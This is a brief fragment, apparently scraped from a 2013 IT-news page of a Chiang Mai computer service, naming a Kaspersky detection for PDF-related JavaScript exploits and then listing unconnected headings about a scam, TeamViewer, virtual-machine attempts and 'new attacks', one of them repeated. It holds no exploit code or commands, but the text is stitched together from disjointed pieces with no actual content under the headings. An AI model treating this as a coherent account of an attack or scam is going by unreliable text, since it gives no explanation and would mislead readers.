The Kaspersky detection name for these exploits is Exploit.JS.Pdfka.gjc.

Posted on 14 March 2013 | 6:55 am

News and non-clompliant code courtesy of

Farang I.T. Home:- computer service in Chiang Mai

So how does the scam work? How was the victim deceived?

TeamViewer

1st attempt: virtual machine #1

The new attacks

1^st attempt: virtual machine #1